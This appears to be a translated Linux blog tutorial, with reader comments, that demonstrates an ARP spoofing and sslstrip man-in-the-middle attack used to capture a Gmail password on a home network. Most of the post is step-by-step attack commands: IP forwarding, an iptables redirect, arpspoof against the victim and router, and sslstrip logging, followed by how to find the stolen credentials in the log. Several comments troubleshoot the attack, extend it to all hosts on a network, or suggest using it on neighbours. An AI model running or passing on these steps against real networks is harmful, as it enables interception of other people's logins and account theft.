Hello Bloggers.
For today I have a small sample of how dangerous it can be to be connected to any unsecured network of those that so many of us like.
For today, I am going to use ArpSpoofing with Sslstrip to get a Gmail password. To make the environment more controlled, I have created an account called "testarp@gmail.com".
And since I don't like the preambles very much, let's get down to business.
ENVIRONMENT
For this test what we have is the following:
1. Attacker: It is my desktop or desktop computer that has Debian Wheezy. From repositories you can install sslstrip y dsniff to get to have harpspoofing
2. Victim: The victim is an Android Tablet that only wants to see his email through the browser.
3. The medium: The middle is my Cisco DPC2425 Router
ADDRESSES.
Attacker address: 172.26.0.2
Router Address: 172.26.0.1
Victim's Address: 172.26.0.8
THE ATTACK:
The first thing we will do for this attack is to activate the forward so that our computer can forward the information to the victim without them noticing. (Otherwise it would be a denial of services attack)
For that we will use:
echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Now if we do tail -f desdelinux we see the information live and direct
So then how do we get what we want?
Let's first enter our mail on the Tablet. While logging in, we see that thousands and thousands of things appear on our console.
Now that it is finished let's open our file “desdelinux” with nano
nano desdelinux
with Control + W we search for something called SECURE POST.
And we will see something like this.
Among that huge line that cannot be seen is the victim's email and password.
So we run to the right until we finally see the light at the end of the tunnel.
On another occasion we will see how we can protect ourselves a little from these attacks.
regards
I take this opportunity to say that when the post was published, the commands were not right.
The iptables command at the end is missing the 8080 which is on another line. And then the arpspoof commands were all on the same line. Each command being on a different line.
Hopefully the editor sees it and can fix it.
Greetings.
I have made the corrections you mention, is that okay?
If you are going to insert code in a preferred entry, use the HTML view, and verify that the article is correct before sending it to pending. Thank you.
It is chilling to know that those of us who do not have knowledge are so vulnerable. Very good information even when I understand little of the subject I realize the importance. Thank you!
regards
But that only works if the attacker and the victim are on the same network. In any case, it seems to me that if (being on the same network) you connect using HTTPS that does not happen because the data is encrypted BEFORE leaving your machine. If you connect by HTTP (without S) I think that even looking at the network cable you see the keys.
It is not true. I am hacking a gmail key and if you notice gmail uses https. So? The point is that although https is secure, it depends on http. So it is not so safe.
Do not confess so much about an https that the S is not for Superman it is for "safe"
it works with or without https, I have tried it with a more specialized linux distro and it works without problems
You can precisely use it to teach those who steal your Wi-Fi a lesson. 😀
It is more or less like what they said a long time ago on Chema Alonso's blog:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, great what it does! / And then they tell my paranoid every time I use the VPN when they go to check the bank account…). By the way you have to see how cynical people are in the comments ... if in the end it is stealing ...
Now we need to take a tutorial on how to create and offer your own VPN service.
The story that you link is very interesting, it even seems worthy of a novel book, and this makes me remember when I used the internet of my neighbors and although I say I know the subject, I think I could never see the true dimensions of the danger that could have last, fortunately for me, they only changed the password to WPA2 and that's where my story with the ISP began haha
That's why the title says Sslstrip in action.
It works, as long as the attacker is in the middle
What wave do you work at prism? -.-
No.
What are you waiting to send your request XD
regards
good post
Interesting, I'll do an educational test later ... Maybe I could even remove the password to the WiFi and have fun for a bit 😛
By any chance, can you do something similar to send different pages to the ones the target requested? For example, they want to open Facebook and I redirect them to Google? 😛
Yes. But it's all a very different roll.
Maybe I'll post it later.
very good post, these topics are very educational, now we need to be able to counteract this attack, since some (like me) connect to public networks (the university for example) it would be helpful to avoid it.
Regards!
It didn't work for me 🙁
Something fails me here, apart from the fact that the https connections are encrypted through a server certificate (once you have the certificate on your machine, your browser is in charge of the encryption) with iptables you redirect port 80 (http) , not 443 which is https
I thought that too. The point is that although https is "secure" it unfortunately depends on http. So sslstrip takes advantage of that, it makes the browser believe that it is using https credentials but it is not.
holy shit! but the browser should see a warning like "this certificate comes from a suspicious site or something like that" ... I will definitely have to do tests XD
No, absolutely nothing comes out.
It finally worked for me
I'm connected on a WEP network with password, and it showed me the password directly anyway.
A query. Can you do this same procedure but for all the computers that are connected in the network, instead of having a single victim?
Yes you can. But I have not done experiments. Try it yourself and tell us how you are doing.
The only thing I get with this is that the victim's machine goes offline, but the sslstrip doesn't show me anything: /
You need to disable the firewall for a moment. Or at least enable incoming connections.
Probe and I could only see the username and password of the facebook page, in gmail I did not find any result in the log, also I only needed a line of arpspoof «arpspoof -i -t«. On the other hand, the victim machine could not open some pages. I will continue investigating, it is very interesting. A help for those who use Manjaro, the packages to install are: dsniff (here is arpspoff), twisted and python2-pyopenssl. Sslstrip can be downloaded from here: http://www.thoughtcrime.org/software/sslstrip/
To run it $ python2 sslstrip.py
Greetings.
It did not come out but the arpspoof line is: #arpspoof -i int -t ip-victim ip-router
look I do exactly what you say:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
The problem is that the victim, who is another pc that I have here in my room, is left without a connection to the point that I have to restart the router, what can I do, help me.
Another thing, I am working with a virtual machine, and when I execute the iwconfig command, wlan0 does not appear, nor when I execute ifconfig, however if I have internet on my virtual machine what with an eth0 interface.